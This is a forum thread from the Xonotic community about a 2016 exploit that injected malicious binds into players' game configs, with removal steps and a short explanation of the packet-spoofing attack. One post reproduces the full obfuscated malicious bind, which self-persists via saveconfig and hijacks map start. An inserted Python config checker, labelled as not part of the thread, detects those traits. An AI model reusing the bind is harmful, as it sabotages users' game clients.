Xonotic Virus - Printable Version
+- Xonotic Forums (https://forums.xonotic.org)
+-- Forum: Community (https://forums.xonotic.org/forumdisplay.php?fid=6)
+--- Forum: Xonotic - General (https://forums.xonotic.org/forumdisplay.php?fid=18)
+--- Thread: Xonotic Virus (/showthread.php?tid=6261)
Xonotic Virus - Mario - 06-16-2016

Hello all,

Recently, there have been reports of wobbly screens and binds overwritten. After some investigation, we discovered an exploit that has been used to redirect clients to a modified server, which then creates a custom autoexec.cfg in the user's data directory. While the exploit is in the process of being fixed, we can't fix the changes to your configuration made by this "virus" automatically.

Steps for removal:
1. Delete the malicious autoexec.cfg (Windows: C:\Users\yourusername\Saved Games\xonotic\data\autoexec.cfg, Linux: ~/.xonotic/data/autoexec.cfg, Mac: ~/Library/Application Support/xonotic/data/autoexec.cfg)
2. Launch the game and open the console (SHIFT+ESC, or ~), then type the following and press ENTER: v_idlescale 0
3. Check the Settings/Input menu for any suspicious looking keybinds and reset them to default

RE: Xonotic Virus - Slick Butter - 06-16-2016

Can this only change keybinds and run in-game/autoexec commands, or is there potential for something worse to happen?

RE: Xonotic Virus - Beagle - 06-16-2016

Umm, eh, about that. I don't have an autoexec file in ~/.xonotic/data. Does that mean I'm safe? And my v_idlescale is 0 by default.

RE: Xonotic Virus - Mario - 06-16-2016

The game is sandboxed fairly well; what this script has done is about as bad as it can get.

RE: Xonotic Virus - Steak - 06-16-2016

Does it affect people that symlinked their autoexec.cfg to Dropbox, etc.?

RE: Xonotic Virus - divVerent - 06-17-2016

It might propagate to Dropbox too, if the symlink had a writable destination.

The removal steps though are not sufficient. I'd rather recommend editing config.cfg and removing any suspicious binds (any line longer than a screen length is probably wrong). Can also remove the v_idlescale command while at it.
RE: Xonotic Virus - -z- - 06-17-2016

For a little more detail on what this looks like, the following lines were discovered in autoexec.cfg and config.cfg:

Code:
bind BACKSLASH "toggleconsole;alias g_fnbwnjlts0 \"\";alias g_fnbwnjlts1 \"alias cl_hook_gamestart_all \\\"map implosion;cl_hook_gamestart_all\\\";cl_hook_gamestart_all;\";menu_cmd rpn /g_igdpbhxyhlodf $cl_matchcount $r_bjsgmspjglr gt def;g_fnbwnjlts${g_igdpbhxyhlodf};menu_cmd rpn /g_igdpbhxyhlodf $vid_gqfhyyvfq $cl_matchcount gt def;g_fnbwnjlts${g_igdpbhxyhlodf};unset vid_gqfhyyvfq;unset r_bjsgmspjglr;unbind ~;bind ~ toggleconsole;unbind `;bind ` toggleconsole;unbind BACKSLASH;bind BACKSLASH toggleconsole;unbind ^;bind ^ toggleconsole;unbind t;bind t messagemode;unbind F5;bind F5 menu_showteamselect;unbind F6;bind F6 team_auto;saveconfig;"

Deobfuscating one of the binds, it appears to create a recursive call to an alias by using a strange rpn calculation to essentially get a 1 or 0 value that correlates with the two aliases, g_fnbwnjlts0 and g_fnbwnjlts1. The code caused QuakeC to crash, resulting in a hung client when I attempted to drop the terminal using tilde. I'm not sure if this was the intended behavior or not. As for now it appears this was just an annoyance.

Code:
// These values were set by the script and are referenced below

RE: Xonotic Virus - Beagle - 06-17-2016

What or who is creating these viruses?

RE: Xonotic Virus - PinkRobot - 06-18-2016

I suspect it's probably the people behind the Nexuiz Antivirus program.

RE: Xonotic Virus - dekrY - 06-18-2016

HAHA!!!!! I had that about a week ago!!!! I realized that some of my binds and aliases stopped working, and that my game would get stuck on loading screens after a map would end, or sometimes would throw me out upon connecting. Took a look at my config and it was messed up, so I just deleted it, the game generated a default one and then I was OK.
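A small config checker, added here as an illustration and not part of the thread or the Xonotic project, that applies divVerent's "longer than a screen" heuristic together with the traits visible in the bind -z- posted (an alias hooking cl_hook_gamestart_all, a `menu_cmd rpn` selector expanded through `${var}`, a nonzero v_idlescale, and a bind that calls saveconfig to persist itself). The sample config and the 120-character threshold are constructed assumptions; point `scan_cfg` at the text of your own config.cfg or autoexec.cfg.

```python
import re

# Constructed sample modelled on the posted bind; obfuscated names are shortened.
SAMPLE_CFG = "\n".join([
    'bind F5 menu_showteamselect',
    'seta v_idlescale "100"',
    r'bind BACKSLASH "toggleconsole;alias g_x0 \"\";alias g_x1 \"alias cl_hook_gamestart_all '
    r'\\\"map implosion;cl_hook_gamestart_all\\\";cl_hook_gamestart_all;\";'
    r'menu_cmd rpn /g_y $cl_matchcount $r_z gt def;g_x${g_y};saveconfig;"',
    'seta crosshair "5"',
])

MAX_BIND_LEN = 120  # assumed "one screen length"; tune to taste


def scan_cfg(text):
    """Return [(line_number, [reasons])] for lines that look like the injected binds."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("//"):
            continue
        reasons = []
        is_bind = s.startswith("bind ")
        if is_bind and len(s) > MAX_BIND_LEN:
            reasons.append("bind longer than %d characters" % MAX_BIND_LEN)
        # v_idlescale, with or without set/seta and quotes; 0 is the sane default
        m = re.match(r'(?:seta?\s+)?v_idlescale\s+"?(\d+)', s)
        if m and int(m.group(1)) != 0:
            reasons.append("v_idlescale is nonzero (wobbly screen)")
        if "alias" in s and "cl_hook_gamestart_all" in s:
            reasons.append("alias redefines cl_hook_gamestart_all (runs on every map start)")
        if "menu_cmd rpn" in s and re.search(r"\$\{\w+\}", s):
            reasons.append("rpn result used to pick an alias via ${var} expansion")
        if is_bind and "saveconfig" in s:
            reasons.append("bind writes the config back with saveconfig")
        if reasons:
            findings.append((lineno, reasons))
    return findings


def is_clean(text):
    return not scan_cfg(text)


if __name__ == "__main__":
    for lineno, reasons in scan_cfg(SAMPLE_CFG):
        print("line %d: %s" % (lineno, "; ".join(reasons)))
```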
RE: Xonotic Virus - Midori - 06-23-2016

So, I have just decided to register on the forums because of all of this. Thanks for all the input on the topic, but the thing I'm (and possibly other players too) really waiting for is detailed technical info on how such an exploit was even possible, how the attackers managed to inject malicious code and pass it through, and what other, much more dangerous risks this exploit potentially poses for both Windows and GNU/Linux players (since it could have been much worse according to the person who claimed to be the troll behind this on the IRC). Of course I'm against disclosing any sensitive details until the game is fixed, that is until the next update, to prevent others from trying to abuse it even more.

The fact is, I have unfortunately quit playing Xon for now because of this happening, because I run Xonotic on my main machine, and I don't own any spare PC to set it up for running risky things, so I have high hopes for a bulletproof solution in the next release. It's pretty sad, maybe even shameful, to see such things happening in a relatively niche, open source game with a good community around it, and there's something ironic in the fact that my goal was to find a game free from trolls and malware, and now we're getting this. What is Xonotic's blessing from a gameplay point of view is also a curse from a security POV, that is, so many things are provided server-side (including the code), thus potentially exploitable.

Anyway, best luck to the devteam dealing with this poop.

RE: Xonotic Virus - Smilecythe - 06-23-2016

Found something that I don't understand in my config. It's under "net_slist_favorites", which is a segment for favorited servers; it shows a bunch of IP addresses and then some weird looking chunks of code. Is this normal config stuff or part of the virus?
RE: Xonotic Virus - Mario - 06-23-2016

Those look normal enough; they're stats IDs (hopefully for servers you've bookmarked). They're more likely to still work even if the server changes its IP.

RE: Xonotic Virus - PinkRobot - 06-23-2016

I would say that we have been let off easily by this hacker. It would have been much worse if it had set cvar rm_rf to 1.

RE: Xonotic Virus - Beagle - 06-23-2016

rm_rf isn't a cvar anymore. That's good.

RE: Xonotic Virus - joeDeuce - 06-23-2016

Maybe if Xonotic didn't suck so bad

RE: Xonotic Virus - Smilecythe - 06-24-2016

(06-23-2016, 06:17 PM)joeDeuce Wrote:
> Maybe if Xonotic didn't suck so bad

Welcome to Xonotic, here's a tutorial for newbies: http://xonotic.org/posts/2014/halogenes-newbie-corner-comprehensive-tutorial/

RE: Xonotic Virus - R+e^i - 06-24-2016

This is hilarious. What was the injection path? Did they poison some random server or a centralized piece like the stats server? The effects are the least interesting thing; what interests me and what matters is how the code was injected in the first place.
RE: Xonotic Virus - -z- - 06-25-2016

As far as I know, the attack was a sort of "man-on-the-side" attack, which boils down to UDP packets from an attack server attacking like a legitimate server arriving at the client faster than the legit packets. Servers with encryption enabled are not affected because these servers can be identified with div's double-blind encryption. An attacker would have to have that server's private key to execute the attack in that case.